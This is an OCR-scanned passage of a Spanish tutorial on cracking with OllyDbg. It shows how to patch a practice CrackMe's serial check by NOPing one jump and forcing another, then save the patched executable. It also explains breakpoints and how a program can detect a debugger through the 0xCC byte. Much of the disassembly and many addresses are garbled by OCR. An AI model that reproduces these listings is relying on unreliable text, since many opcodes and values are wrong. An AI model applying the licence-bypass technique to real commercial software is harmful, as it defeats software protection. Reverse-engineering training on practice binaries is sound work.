Es 20000009 
S1F7 72560090 
8BC7 

EB 15 

SE 

£A 30 


68 60214000 
68 69214000 


FF7S BS 
Es 79000000 
Cc3 


y. 


k 


A E EE 


Ss 


> 


.. . rasa 


Allí vemos ora comparación y un salto condicional que nos llevan al cartel maldito pongamos otro 


BREAKPOINT allí. 

3ñ96 MOU_AL,BYTE PTR DS: [ESI] 
8400 TEST AL,AL 
74 13 
3c 41 CMP AL, 41 
72 1F J8 SHORT CRACKME.684613AC 
3C SA CMP AL,SA 
73 03 NB SHORT CRACKNME. 00491394 
46 INC ESI 
EB EF 
Es 39000000 
46 INC ESI 
EB E7 
SE POP ESI 
Es 20000000 
S1F7 72560001 XOR EDI,S678 De 
8BC7 MOU EAx, EDI 

v|EB 15 JMP SHORT CRACKME. 00491301 
»5E POP ES! 
6A 30 PUSH 3: 
68 60214009 | PUSH RACKME. pD492169 

69214000 |PUSH CRACKME. 00492169 

FF7S 08 PUSH DIORO PTR SS: [EBP+8] 
ES 79009090 a! 


JMP_SHORT CRACKME. 00491383 
POP ESI 

CALL_CRACKME. 80481302 

ZOR EDI,5678 

MOU EAX+ EDI 


12) 
PUSH CRACKME. 60402160 
PUSH CRACKME. 60402169 
PUSH DWORD PTR_SS: [EBP+8] 


F0R EDI,EDI 
XOR EBX,EBX 
MOU_BL,BYTE PTR DS: [ESIJ 
TEST BL,BL 


ADD EDI,EBx 
INC ESI 


SUB AL,20 
mou EoTÉ PTR DS: [ESIJ,AL 


ZOR_EOX,ERX 


e 


= MB_OK¡MB_ ICONEXCLAMAT ION: MB_ APPLMODAL 
"No Luck?" 


"No luck there, matet"” 


MessageBoxA 


Y demos RUN acepto el cartel malo anterior y voy a poner de nuevo 


yle = MB_OKiMB_ ICONEXCLAMATION:MB_APPLMODAL 


Register 


Name Iricnar456 


Serial [98989898 


OK | Cancel | 


Al aceptar 
40 . FFYS 63 PUSH DWORD PTR SS: [EBP+8] 
a E ES EDOBBBan 
15) a 
0040 5 2B7424 04 MOU ESI,DWORD PTR SS: [ESP+4] 
0040 . 56 PUSH ESI 
0040 > 8AB6 MOU_AL,BYTE PTR DS: [ESI] 
0u40 . 8400 TEST AL,AL 
0040 .v 74 

40 A CMP AL, 41 
¿72 

E ES CMP AL,SA 

a .v| 73 JNE SHORT CRACKME. 00401394 

a . 146 INC ESI 
."| EB EF 
> [ES 39000000 
. 146 INC ESI 
."| EB E? 
> | SE P ESI 
. [ES 20000009 
. |81F7 78560001 XOR EDI,S678 
. | 8BC7? MOU EAX, EDI 
.«v|EB 15 

SE POP ESI 

. 6A 39 PUSH 38 


. 68 69214000 |PUSH CRACKME. 600402160 
£2 RQP1dAnA (PISA PROPKME ARAPIAO 


Vemos que no saltara la primera vez que para hacia el cartel malo, aunque si compara cada letra que tipee 
a ver si son números parara una vez por cada letra, F9 nuevamente 


A la 7ma vez que apreto recordar que en ricnar456 el 4 es la séptima letra me quiere mostrar el cartel 
malo saltando 


CMP AL, 41 


CHaP ShoRr 


INC ESI 
ER 
39000000 


INC ESI 

EB E7 JMP_SHORT CRACKME. 80401383 
SE POP ESI 

ES 20000000 

S1F7? 78560001 XOR EDI,5678 

8BC? MOU EAX, EDI 

EB 15 

SE POP ESI 


MB_OK:MB_ ICONEXCLAMATION: MB_APPLMODAL 
"No luckt” 


PUSH 38 
638 60214000 | PUSH CRACKME. 00402160 lo 


68 PUSH CRACKME. 00402169 "No luck there, matet” 
F75 63 PUSH DWORD PTR SS: [EBP+8] r 

ES 79000090 geBoxA 

33FF Z0R EDI,EDI 

330DB XOR EBX,EBX 

aaiF canu Al.AYTE PTR MS: TFSTA 


ElIP 6640138B CF 


ES B023 32 
ES 0B1B 3 
SS 0B23 3 
DS 0823 3 


S BB3B 32 

BBB NL 
LastErr EF 
EFL BBBBB2ZS7? (tr 


STO empty 4.137 
ST1 empty 3.787 
ST2 empty 4 
ST3 empty 3.491 
ST4 emntu ñ 


| 4 


FHOU AL,BYTE PTR DS:[ESI] 
TEST pre 

CMP add 

CHP a ea 


INC ESI 


5] 


¡DO OOOO 


01 0R EDI,S673 
MOU EAX,EDI 


PUSH CRACKME. 00402160 
PUSH CRACKME. 00402169 
PUSH DWORD PTR SS: [EBP+85] 


Text. 
h Own e 
Mess: 


Ahora ya no salta, apreto F9 y repito el mismo procedimiento para los otros dos números que puse en mi 


nombre fuerzo que nunca salte. 


ADD ESP, 4 
POP EAX 


Cap a Ds 


ENTER 0,0 


PUSH_EDI 
CMP_OWORD_PTR SS: [EBP+CI,110 


CMP_DWORD_PTR e 


ADD ESP, 4 
POP EAX 
CMP_EAX, EBX 


Ara DAN AR AAA AMAN MANA ATA PS.TPANi27 14 


Y al apretar F9 


Good work! [X] 


Great work, mate! 
Now try the next CrackMe! 


Ahora por supuesto todo esto lo hemos hecho en memoria cambiando FLAGS, como hacemos para 
guardar definitivos estos cambios y que el crackme acepte cualquier user y serial sin OLLYDBG. 


Vayamos al primer salto 


1 .« 56 PUSH ESI 

al > 8AD6 MOU AL,BYTE PTR DS: [ESI] 
Bl . 8400 TEST AL,AL 

1 .v 74 13 

61 «30 41 CMP AL, 41 


S1F7 78560001 OR EDI,S678S 
2BCc7? MOV EAX, EDI 


POP ESI 
6A 30 PUSH 308 
68 60214000 | PUSH CRACKME. 60482160 
68 622140006 | PUSH CRACKME. 604682169 


“pre 1F 

61 . |3C SA CMP AL,SA 
al .«v| 73 03 JNB SHORT CRACKME. 00401394 
61 . 146 INC ESI 
al »*| EB EF 
al > [ES 39000000 
Bl . 146 INC ESI 
al »*| EB E? 
61 + ¡SÉ POP ESI 
5 ES 20000000 

1 

1 


Mo 


AA AOS 
£ 
y 
nm 
m0 
o 
pun 
mn 


Lo que nosotros hemos hecho en este salto es forzarlo mediante los flags a que no salte nunca a pesar de 
los valores de la comparación, eso es similar a NOPEAR el salto condicional, si hago click allí, apreto la 
barra espaciadora y escribo NOP. 


Assemble at 0040138B 


NOPÍ 


IV Fill with NOP's Cancel | 


NOP- 
NOP 
Cie aL SA 


INC ESI 


A pr pr pr pd 


SAb6 MOU_ AL,BYTE PTR DS: [ESIJ 
8400 TEST AL,AL 
74 13 

401 3C 41 CMP AL, 41 

Bi 90 NOP 

61 90 NOP 

401 3C 5A CMP AL,SA 

al 73 83 

al 46 INC ESI 

m1 EB EF 

m1 Es 39000000 


Ahora veamos el otro salto 


>u FPUF EHX 
3BC3 CMP_EAX, EBx 
4 07 
13010000 
B 9A 
FCobaooa 
B 93 


5 B0000a ENTER 0,5 


PUSH EBXx 
PIISH EST 


15 
15] 


DO 
DOS 


En esta caso fue al revés lo forzamos a saltar siempre mediante la manipulación del FLAG Z, lo cual seria 
equivalente a cambiar el salto condicional por un JMP. 


Assemble at 00401243 
[UMP[OD40124C +] 


7 Fil aith NOP'S Cancel | 


ADD ESP, 4 

. 58 POP EAX 

3BC3 CMP_EAX, EBX 

EB 07 JMP SHORT CRACKME. 06461240 


) 


9 
Es FCobBBBa 
EB 93 
Ca 66000B ENTER 0,0 


Allí siempre saltara, quitamos también el breakpoint y sin salir de OLLYDBG probamos si quedo bien, 
apreto F9 


Register 


Narne [882yews b 
Serial lih383hsi] 


OK | Cancel | 


Al apretar OK 


EJ 
A Great work, mate! 
Now try the next CrackMe! 


Igual recordamos que cuando escribimos en OLLY con la barra espaciadora o ASSEMBLE los cambios 
desaparecían al reiniciar, tenemos que hallar la forma de que los guarde de la memoria al archivo 
definitivo, eso se hace de la siguiente manera 


Good work! 


8304 M4 ADD ESP, 4 
58 POP 
CMP_EAX,EBx 


a? >4r 

5 jsoloooo Backup » 
FCoaaaaa 

B 93 Copy » 
B00Baa ; 

3 Binary » 


Undo selection Alt+BkSp 


57 PUSH EDI 
8170 6C 10011 CHP._DUORO PTA SS: L 

s17D_8C 1101 E Ed Assemble Space 
7435 


JE SHORT CRACKME. Bl 
Label 


837D BC 18 P : : 
8170_80 61821 CHP_DWORO_PTR, SS: L Cornment ; 
JE SHORT CRACKME. Bt 
BS OO00B00a |MOU EAX, O i » 
= po Dl Breakpoint 
POP EBx Hit trace » 
2 1009 E Run trace » 
Bl PUSH 1 
[17 PUSH B 
FF7S 08 PUSH DwoRD PTR sSs:[ Follow Enter 
. ES ESO10000 ee 
5 FF75 08 PUSH _DWORO_PTR_SS:l New origin here  CtriGray * 
Go to » 
Follow in Durp » 


Search for » 
Find references to » 


RETURN to CRA! 
RETURN to USER32 


Wien AE 
Selection En 
Analysis » 


Appearance » 


CLICK DERECHO en cualquier parte del listado COPY TO EXECUTABLE-ALL MODIFICATIONS 
allí se nos abre esto 


Copy selection to executable file? 


Copy all | Skip Cancel | 


Elegimos COPY ALL para que copie los dos cambios que hicimos 


C:Wocuments and SettingsiRicardoYEscritoriol101-CrackmeiC... Eulmx) 


El] NOP 2 
30 SA CMP AL,SA 

73 63 JNB SHORT 60000994 

46 INC ESI 

EB EF JMP SHORT g000nse3 - 
Es 39000000 [CALL AABBBSDZ E 
46 INC ESI 

EB E? JMP SHORT 6000nse3 

SE POP ESI 


ES 20000000 CALL _BuBBaB9C2 
EoES 73560009 |XOR EDI,S678 


MOU EAX, EDI 
EB 15 JMP SHORT 00BBB9C1 
SE POP ESI 
£A 30 PUSH 30 


68 60214000 PUSH 402160 
68_69214000 PUSH 402169 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] Y 
Es 79000000 CALL BOBBBASA ¡a 


Se nos abre otra ventana, allí hacemos nuevamente CLICK DERECHO-SAVE FILE 


a NOP 
3C SA CMP AL,SA 

vw 73 83 JNE SHORT 08000994 
ES INC 

A 


B EF JMP SHORT 00000983 
Es 39000000 CALL 00000902 
6 INC ESI 


A EB E? JMP SHORT 60000983 
POP ESI 


Es 20000099 CALL _BBBBBIC2 
o 
v EB 15 JMP $ Backup 


POP E 
O ad 
és éesz14000 [Push Binary 
FF7S 08 PUSH 

Es 79000000 [cALL  Assemble 
¿E_SHOF Search for 


An ta nffant Ptrlar 


Save file as 


Guardar en: | () 01-Crackme y] a] e Edy 
e [E] CRACKME.EXE 
Documentos 


recientes 

Escritorio 

Mis documentos 
Mi PC 


« 


Mis sitios de red Nombre: 


Tipo: | Executable file (*.exe) $ ] Cancelar | 
2 


Lo guardamos con OTRO NOMBRE para tener el original para seguir practicando le pondré CRACKME 
2 


Mis sitios de red Nombre: [CRACKMEZ. EXE 
Tipo: [Executable file (*. exe) 


Cierro el OLLYDBG y veo que al lado de donde tenia el crackme esta el crackme2 


CRACKME.EXE 


Hago doble click en el crackme2 a ver si quedo bien modificado lo corro sin OLLYDBG. 


CrackMe v1.0 Ejalx) 


File Help 


Voy REGISTER 


Register 


Name juguaax3 
Serial [qe8s uiiiishb 


OK | Cancel | 


Apreto OK 


Good work! 


A Great work, mate! 
Now try the next CrackMe! 


Jeje ahí tengo el crackme parcheado pero aun no me conformare con esto, mas adelante veremos como 
trabaja con los seriales y como compara si en el nombre hay números, exhaustivamente y hallaremos 
seriales correctos para nuestro nombre que los acepte sin parchear pero para llegar a eso aun faltan 
algunos conocimientos y practicas anteriores. 


APÉNDICE PARA WINDOWS 98 


Bueno usar OLLYDBG en w98 como ya les dije es bastante limitado, el mismo sistema no nos deja poner 
BREAKPOINTS en las apis directamente como en w98, por lo tanto el método será similar con la única 
limitación que ustedes no podrán poner BREAKPOINT en la api, si hacen CLICK DERECHO SEARCH 
FOR NAME (labels) in this module como dice allí la primera parte de la explicación para XP 


0403180]. idata Import 
B64031A0|. idata Import 
BB4B31C8|. idata Import LoadMenuA 

BB4B319C|. idata Import USER32, LoadStringA 
BB4B322C |. idata Import KERNEL32. |strlen 


2.LoadCursorA 
LoadIconA 


66403194 |. idata Import USE MessageBeep 
BB4B31AC .idata Import USERS2. MessageBoxA 
604501000 | CODE Export Modu leEntryPoint> 
BB4B31C0|. idata Import SER32. Move) indow 


BB4B3220|. ¡data Import KERNE 32.0penFi le 
B64031B0|. idata Import SER 
60403288 |. ¡data Import COMDLG3 


32.PrintDlgA A 


Les saldrá la misma lista y de la misma forma apretando el nombre de la api llegaran hasta el nombre de 
la misma, pero en 98 no pueden hacer CLICK DERECHO-TOGGLE BREAKPOINT ON IMPORT ya 
que no permite poner BREAKPOINTS en las apis, si no que deberán hacer. 


DU4+UOS5S1ILO]|. 10a3Ta 1Mport 
BB4B319C|.idata | Import 
60403220 |. idata Import 2. |strlen 

BO403194 |. idata Import SERS32.MessageBeep 

BO4B31AC'.idata | Import USER32: MessageBoxA 2 E 
604016565| CODE Export ¿Modu leEntryPoint> li 

004931C0|.idata | Import  |USERS2.MovelWindow Actualize 


LOSorMenuH 
LoadSt ringA 


Ba6463220) .idata Import 2.0OpenFi le A A ; 
BO403180| .idata | Import PostQu itMessage Follow import in Disassembler 
iS: PEEL Follow in D 
«¡data mport eadFile 
pa . ta dc Elo da ert id prada ni 
«¡data mport endMessage ¡ “aeferences ta irmnaor 
004aS1A8 : ¡data Import serrocus Find references to import 
«¡data mport etTimer . 
00403108|.idata | Import SetlindowPos View call tree 
BB4031CC|. idata Import 2. Show indow 
60463260). idata Import «StartDocA A o 
00483250! .idata | Import ¿StartPage Togale breakpoint on import 


Creo que el menú es similar si no siempre tendrá la opción para BUSCAR LAS REFERENCIAS o sea los 
llamados a la api en el crackme. 


Address |Disassembl Comment 


60461350! CALL <JMP. USER32. MessageBoxHA> 
004981373) CALL <JMP. USER32. MessageBoxA> 
B04013BC|CALL_<JMP. 2 USER32. MessageBoxA> 
60491434) JMP DWORD PTR DS: C<2USER32. MessageBoxA>| USER32. MessageBoxA 


Esto es limitadísimo comparado con la posibilidad de poner un BREAKPOINT en la API, porque si la 
API es llamada, si hay un BP en la API parara, en cambio en 98, la API puede ser llamada en alguna 
forma que engañe el análisis del OLLYDBG (y hay muchas formas créanlo) y no saldrá dicha llamada 
entre las referencias y no tendrán forma de saber de donde fue llamada la api ni parara. 


Igual pueden seguir este tute de la misma forma sabiendo que hay tres llamadas a la api MessageboxA y 
en vez de poner UN BREAKPOINT en la api, pongo un BP en cada referencia a la api, allí en el cuadro 
de referencias apreto F2 en cada una, 


ex] >] »i 3] > LJEJMT|¡WH|cj/]K 


CALL <JMP. ¿USER32. MessageBoxH> 
CALL <JMP. 2 USER32. MessageBoxA> 
CALL <JUMP. SUSER32. MessageBoxA> 
6040143A| JMP DWORD PTR DS: [<24USER32. MessageBoxA>| USER32. MessageBoxA 


Al dar Run voy a HELP-REGISTER tipeo estos datos 


Register 


Narne Inicnará56 
Serial [98989898] 


OK | Cancel | 


Y al apretar OK parara 


. ES 20000099 | CALL CRACKME.004B1302 
. bere 7356b000l OR EDI,S67S 


00401 . SB MOU EAX,EDI 
0B4B13AA|| .v EB 15 ¿ME SHORT CRACKME. 06401301 
> SE POP ESI 
. 68 30 PUSH 36 Style = MB_OKIMB_ ICONEXCLAMATION:MB_APPLMODAL 


20401 A 
4645013B 
404013B9 


63 60214000 | PUSH CRACKME. seis 
PUSH CRACKME. 6040; 
PUSH DWORD PTR ESA LÉbp+8] hOwner 


es MessageBoxA 


X0R EDI,EDI 
XOR EBX,EBX 
[res BL, EJE PTR DS: [ESI] 


TEST BL. EL 
Luego en XP ponemos un BP en el RET de la api o donde termina la misma, eso equivale en 98 a poner 
un BP en el RET que esta justo debajo ya que no podemos entrar a la api. 


= "No luck? 
"No luck there, matet” 


A TR AA 


"No luckt” 
"No luck there, matet” 


PUSH CRACKME. 00402160 Ti 
PUSH CRACKME. 06402169 Te 
PUSH DWORD PTR_SS: [EBP+8] hOwner 

MessageBoxA 


FOR EDI,EDI 
XOR EBX,EBX 
r mov BL,BYTE PTR DS: [ESIJ 


Pues ya saben cuando el el tute dice que esta en el inicio de la api y ve a donde retorna ustedes saben que 
retorna en este caso a 4013C1 al ret que esta justo abajo y si es en otra referencia sera el RET que esta 
debajo correspondiente. 


Sabiendo esto ya pueden retornar a 


RETORNO DEL APÉNDICE PARA WINDOWS 98 desde aquí sigue para todos los SO. 


Y continuar el tute desde allí siempre sabiendo la diferencia principal que es que en W98 no podemos 
poner BPX o BREAKPOINTS en las apis si no en las referencias. 


Hasta la parte 10 
Ricardo Narvaja 
22 de noviembre de 2005 


INTRODUCCIÓN AL CRACKING EN OLLYDBG PARTE 10 


BREAKPOINTS EN OLLYDBG 


Esta parte la dedicaremos a entender los diferentes tipos de BREAKPOINTS en OLLYDBG, entendiendo 
por BREAKPOINTS las herramientas que trae OLLY para ayudarnos a detener la ejecución del programa 
en donde nosotros deseamos, para los cual usamos uno de los diferentes tipos de Breakpoint que 
estudiaremos a continuación, para lo cual usaremos como victima el inefable Crackme de Cruehead. 


BREAKPOINT COMUN o BPX 


Es el Breakpoint común que hemos utilizado hasta ahora, también llamado BPX por su similitud a la 
forma de tipearlo en SOFTICE, muchas veces se utiliza la sigla BPX como abreviatura de 
BREAKPOINT, aunque estrictamente en OLLYDBG se tipea BP. 

Normalmente se puede colocar marcando la línea que queremos ponerle el BPX y apretando F2, si 
apretamos F2 nuevamente se quitara. 


Miremos el CRACKME DE CRUEHEAD en el ENTRY POINT 


[c] File View Debug Plugins Options Window Help 


mx] en] vis $1) 1] +] 1/Ejm]t[w nc] 1]k]B/R]»-.] 5] 


106 6A Bu E en 
a AS FFo4ubaa JMP. KERNEL32. GetModu leHandleA> 


n00- DUORD PR DS: [4020CA],EAX 
sa Un PUSH A 
68 F4204000 |PUSH CRACKME. 004020F4 ASCII "No need to disasm the codet” 
ES A6B4B6BB_|CALL_<JMP.SUSERS2.FindllindowA> 


OR EAX, EAX 
aL 
5 C70s 64 MOU DWORD PTR DS: [402064], 4003 
. C705 MOU DWORD PTR DS: [402068],CRACKNE. ln dPyr 


Cros 6 Al MOV DWORD PTR DS: [46206C],0 


Si marco por ejemplo 401018 y apreto F2, pues se marca en rojo la dirección para señalarnos que hay un 
BPX y además en la ventana B que es la lista de BPX que hemos colocado, se nos mostrara. 


Options Window Help 
LE) ) + 1/2/m)T/wJn)c/,]x)8/r]- Js] +5/3712] 


B 
<JMP. ¿KERNEL32. GetModu leHandleA> 
EL PTR DS: [4626CA],ERX 


CRACKME. 004B020F4 ASCII "No need tóárdisasm the codet” 
<JMP. 2 USERS2.FindllindowA> 


aa 


WORD PTR DS: [402064], 4003 

WORD PTR DS: [492068], CRACKME.. lin dPr 
WORD PTR DS: [40206C],08 

WORD PTR DS: [402070],0_ El 


Vemos que nos muestra que esta activo 


En la columna ACTIVE nos dice que ALWAYS que significa que parara SIEMPRE que pase por allí o 
sea que esta activo. 


Si hacemos Click derecho sobre el BPX podemos ver las opciones que tenemos para manejar el 
BREAKPOINT 


Ex] »u] vijsi $0) 9] > 1]EJmM/T/w)H/cC]4]K]B]R]- JS] ¡8 


Address [Module  |Active Disassemb ly Comment 


CRACKME | Always OR ERAX, EAX 
Disable . Space 


Edit condition 
Follow in Disassermbler Enter 


Disable all 


Copy to clipboard » 
Appearance 


REMOVE: para quitarlo de la lista totalmente 


DISABLE: Para que quede en la lista de BREAKPOINTS pero deshabilitado, o sea no parara allí cuando 
pase por esa dirección. 


EDIT CONDITION: Para transformarlo en un BREAKPOINT CONDICIONAL que mas adelante ya 
veremos que es. 


FOLLOW IN DISASSEMBLER: Para buscar la dirección en el listado del breakpoint que marcamos. 


DISABLE ALL o ENABLE ALL: Deshabilitar o habilitar todos, en este caso habilitar todos no aparece 
porque el único existente esta habilitado. 


COPY TO CLIPBOARD: para copiar al portapapeles los datos sobre el BPX marcado, si elegimos esta 
opción y pegamos aquí por ejemplo. 


EXPIRADO E 


Address |Module | Active Disassembl: 
E ways . 
Remove Del 
Disable Space 
Edit condition 


Follow in Disassembler Enter 


Disable all 


Copy to clipboard ETAPA 
Appearance »' Whole table 


Address 
Module 
Active 
Disassembly 
Comment 


Elijo WHOLE LINE o sea que copie toda la linea, WHOLE TABLE copiara toda la lista de 
BREAKPOINTS. 


Breakpoints, item 0 
Address=00401018 
Module=-CRACKME 
Active=Always 
Disassembly=0R EAX,EAX 


Lo copiado y pegado aquí muestra los datos de ese BREAKPOINT como la instrucción donde fue 
colocado, su dirección, si esta activo etc. 


Ya vimos que si doy RUN con F9, parara en la dirección del BPX si se ejecuta, en este caso para. 


Allí paro 


CUE uu) vis apa) 2 1jEjmT/wH]c]/]k]B/R/--]s] ¿52 


5A 60 PUSH 

ES FFO40008 | CALL COMP. £KERNEL32. GetModu leHandleA> 
sE cenas MOU DWORD PTR DS: [4020CA7,EAXx 
68 


PUSH B 

F4204000 | PUSH CRACKME. 064020F4 ASCII "No need to disasm the codet” 
Es A664000B_ |CALL <JMP. USERS2. FindWindowA> 

Beca OR EAX, ERX 

74 ul 

Cc3 


c7a5 MOU DWORD PTR DS: [402064], 4003 
PFAR ASPAAA MAI MNR PTR NS-TáaPAR21 PROPEME hinAPr 


Y OLLY nos dice que esta PAUSADO 


Y a la izquierda nos muestra el motivo porque paro 


sakpoint at CRACKME.00401018 


Ahora estrictamente el BPX que es ?, veamos si realiza OLLYDBG algun cambio en el codigo al 
activarlo. 


Si hago click derecho FOLLOW IN DUMP-SELECTION 


DO+O 1U0L 0H Yu 
D040100E 
boa4a1ais 


run Y 
68 F4204000 [PUSH CRACKME. 004020F4 ASCII "No need to disasm the codet” 
Es A6040000 En at LD OU 


¡EA PORT CRACKME Backup » | 


MOU DWORD PTR DS 


Ea MOU DWORD PTR DS Copy » 

a MOU DWORD PTR DS p. 

a MOU DWORD PTRDS Binary » 

E MOÚU EAX, DWORD PT 

90 HOU DWORD PTR Ds Assemble Space 

a PUSH 64 5 


a PUSH EAX Label 
ES D1030000 | CALL "<JMP-2USERS 
AS 72204909 |MOU DWORD PTR DS 


El és d97Fe9a8 | PUSH 7F0 Comment ; : ARROW 
Bl a . 
o Es Azosagas | CALL <ampseuseRs  Breakpoint » 

As 70204908 | MOU DWORD PTR DS 


mi A 
MOU PURO ETE DS Hit trace » 


Mi 
MOU DWORD PTR DS » 3 to disasm the codet” 
PUSH _CRACKME. 004 Run trace ¡ACKME. 60402064 


Shoro ere. D New origin here CtrHGray * 
Go to > 


00 
pOSOUaaa go0a E 
es easeeess |pusH seba ollow in Dump 


A 6E 
68 B4000000 | PUSH BB4 View call tree 
68 BOBBCFOB |PUSH ACFOGOS e 
68 E7204990 |PUSH CRACKME. 84 


CtrHK 


RLAPPED:WS_MINIMIZEBO 
CrackMe v1.8 


Aparentemente no hay cambios con respecto a los que vemos en el listado 


0040100E 52 F42040900 | PÚSH CRACKME. 004020F4 


00491913 E BBB |CALL < E SUSER32.FindWindowA> 


1u4b1B1A , 
BB4B1BIC 


DELLA 
Allí vemos tanto en el DUMP como en el listado los bytes OB CO correspondientes a la instrucción 
OR EAX,EAX 

asi que no hay cambios parece pero es así realmente? 


Reiniciemos el crackme y veamos que el BPX continúe puesto en 401018 


Pako M5 2393) $345 9) “*3) 000 000 2000 00 DO) 188 US FE FE HE E E 1) 


PUSH 6 
CALL <JMP. 8 KERNEL32. GetModu leHandleA> 
MOU DWORD PTR DS: [4026CA],ERAX 


PUSH B 

PUSH CRACKME. 044020F4 ASCII "No need to disasm the codet” 
CALL _<JMP. 8USER32.FindllindowA> 

OR EAX, EAX 


Ol MOU DWORD PTR DS: [402064], 4003 
21 MOU DWORD PTR DS: [402068], CRACKME. ln dPxr 


Voy a escribir una línea que leerá de la memoria realmente el valor que hay allí. 


[9 He  Yiew  LUeDUg  FPIUgIns UPptONS VYINCOW Help 


LE AU e ES A MONOS 


Tanto en el DUMP como en la aclaración nos muestra OB CO los bytes originales, pero aun desconfío, 
apreto F7 para ver que mueve a EAX. 


A |Registers (FPU) 


+ nt 
EBX 7FFDDOOS 
ESP BO12FFC4 
EBP OO12FFFO 
ESI FFFFFFFF 
EDI 70920738 ntdll.' 


EIP 060401005 CRACKMI 


CO ES BB23 32bit 1 
P10 FS ARIR S2hit 1 


Como no era que en 401018 estaban los bytes OB CO 74 01 ?, alguien esta mintiendo aquí pues esos bytes 
al revés son 0174C00B y el valor que movió a EAX es 0174C0CC, o sea que realmente en 401018 no hay 
un BO cuando pongo un BREAKPOINT, OLLYDBG lo reemplaza por el valor CC que mas adelante 
cuando veamos el estudio de las excepciones, veremos bien que significa, pero OJO a pesar de que 
OLLYDBG para no ensuciar el listado original, no lo cambia ni en el DUMP, ni en las aclaraciones, cada 
vez que ponemos un BP estamos colocando el byte OCC en la dirección del BPX y eso como ven puede 
ser fácilmente detectado por un programa que verifique si en esa dirección hay un CC en vez del código 
original, y de esa forma detecta que hay un debugger y puede evitar que corra el programa saltando si 
encuentra un CC a la salida del mismo. 


Así que no se confíen, recuerden siempre que si apretamos F2 cambiamos código aunque OLLY 
mantenga todo igual y el programa continúe, dicho BREAKPOINT puede ser detectado, si en algún 
programa ven que al colocarle un BREAKPOINT no corre pues quítenlo hay otras posibilidades en 
OLLYDBG para parar donde queremos. 


También un BREAKPOINT se puede tipear en la commandbar 


BP 401018 


Command BP 401018 y] 
A 


En NT, 2000, XP y 2003 no hay problemas para colocar BP en las apis como vimos en partes anteriores 
podemos poner un BP en la api MessageBoxaA, tipeando 


Yu9UIVEO| ES YU 13 UY UU 6H 4l 6H| PIO... JU) 


Commanc BP MessageBoxA y| 


AAA ___AAKÁ 


Lo escribimos respetando las mayúsculas y minúsculas del nombre de la api, en Windows 98 en cambio 
ya que no se puede colocar breakpoint en las apis se tipea. 


| | 
Command BPX MessageBoxA y| 
NN, 


Lo cual nos pone BREAKPOINTS en las referencias O llamadas que el programa haga a la api y que 
OLLYDBG pueda detectar, lo cual no es muy bueno, pero en 98 no hay otra posibilidad. 

Por supuesto el comando BPX existe también en XP aunque no es usado prácticamente, porque siempre 
es mas poderoso colocar un BP en la misma api que en las llamadas a la misma que OLLYDBG pueda 
detectar. 


Igual vemos que coloco algunas 


Address [Module  |Active Disassemb ly Conme 
b64b15618| CRACKME |Always 
B04B135C| CRACKME | Always 
04601373) CRACKME | Always 
BO4B13BC| CRACKME | Always 
77D504EA USER32 Always » 


Allí en la lista de BREAKPOINTS al apretar BPX MessageBoxA encontró tres llamadas a dicha api y le 
puso un BP a cada una. 


De cualquier forma aclaro que este comando no lo usare casi nunca al no trabajar en WINDOWS 98, y 
siempre que me refiera a un BREAKPOINT o BPX me refiero a tipear BP en la comandbar. 


La ultima forma de colocar un BP es con el Mouse haciendo doble click en la línea que queremos 
colocarlo, en la columna donde están los bytes de la instrucción, al hacer doble click nuevamente se quita. 


in 
dx] et] vie $ do e] + Ljejmjtiwjn]c/+]k]: 
PUSH B 


5A BB 
Es FFO46600 [CALL <JMP.*¿KERNELS2. GetModu leHandleA> 
AS CA204009 |MOU DWORD PTR DS: [4626CA],EARX 


PUSH O 

PUSH CRACKME. B046020F4 ASCII "No mn 
CALL <JMP. ¿¿USERS2. FindWindowA> 

OR EAX, EAX 


y 


¡DAD 
dodo 
IDO O 


RRA A 
No 
a a e o a e e e 


MOV DWORD PTR DS: [402064], 4003 
MOV DWORD PTR DS: [402068], CRACKME. ln dPxi: 
MOU DWORD PTR DS: [40266CJ,0 


Da 
DO 
DoS 


.... +... q... 


a40 B MOU OWORD PTR DS: [462076]1,0 

04015045 MOV EAX, DWORD PTR DS: [4626CAJ 
a164A MOV OWORD PTR DS: [402074], EAX 
a104F PUSH 64 isroName = 
o1051 PUSH EA%x [nine =>_NL 


BREAKPOINTS ON MEMORY (MEMORY BREAKPOINTS O BREAKPOINTS EN 
MEMORIA) 


Bueno pasemos a los MEMORY BREAKPOINTS o también llamados BPM por BREAKPOINT ON 
MEMORY (algunos viejos memoriosos no confundir con los BPM del SOFTICE que son otra cosa) 


Bueno como funcionan,al colocarlos OLLYDBG lo que hace es cambiarle el permiso de una sección o 
parte de la misma, según el permiso que le demos, podemos colocar BPM ON ACCESS que detendrá la 
ejecución, cuando se acceda al sector al cual le colocamos el BPM, o sea parara cuando ejecute esos bytes 
o cuando lea o escriba en los mismos. 

También existe el B2M ON WRITE que para solo cuando escribe en la zona que colocamos el BPM, 
veremos algunos ejemplos prácticos. 


5A UB PUSH B 
Es FFO40060 |CALL <JMP.¿KERNEL32. GetModu leHandleA> 
AS CA204060 |MOU DWORD PTR DS: [4620CA7,EAX 
6A Ba PUSH B 
68 F4204000 |PUSH CRACKME. 004020F4 ASCII "No need to disasm the codet” 
Es A6040060 |CALL _<JMP. 2 USERS2.FindllindowA> 
. BBCO OR EAX, EAX 
.v 74 01 
. C3 
> C705 


A A 


Allí estoy en el ENTRY POINT del Crackme de Cruehead, y pondré distintos BPM, para ver la utilidad 
de los mismos. 


En el DUMP voy a ver la dirección 4020CA con GO TO EXPRESIÓN : 4020CA 


ABOUT. G 
cod work 
t. Great 
work, ma 
tet.Now 
try the 
next Cra 
ckMet. No 
luck*t.N 
o luck t 
here, ma 
tetanso. 


Allí la veo, puedo colocar un BPM ON ACCESS en los 4 bytes del contenido de la dirección 4020CA, y 
dar RUN, supuestamente parara o bien cuando lea de 4020CA, o cuando escriba en 4020CA o si ejecuta 
alguna instrucción en 4020CA, para colocar el BPM marco los bytes que quiero que abarque en este caso 


marco cuatro. 


Ahí están marcados, hago click derecho BREAKPOINT-MEMORY ON ACCESS que es poner un BPM 
ON ACCESS en los bytes que marque, que en este caso son 4 pero podrían ser mas o menos según lo que 
nos convenga, o sea podemos marcar zonas mas grandes, y colocarles BPM en la misma forma. 


3 


n=] 
5 
3 
L=] a 
3 E 
= 5 
y 


Search der 
Find references CtrR 
View executable file 

Copy to executable file 

Go to » 


Memory, 


Hardware, on access » 
Hardware, on write » 
Hardware, on execution 


>1 


Lo único molesto que tienen los BPM es que no figuran en la ventana B de breakpoints ni en ninguna 
parte en OLLY, por lo cual debemos recordar donde lo colocamos. 

A su vez OLLY permite solo un BPM a la vez por lo cual si colocamos un segundo, automáticamente 
borra el anterior. 


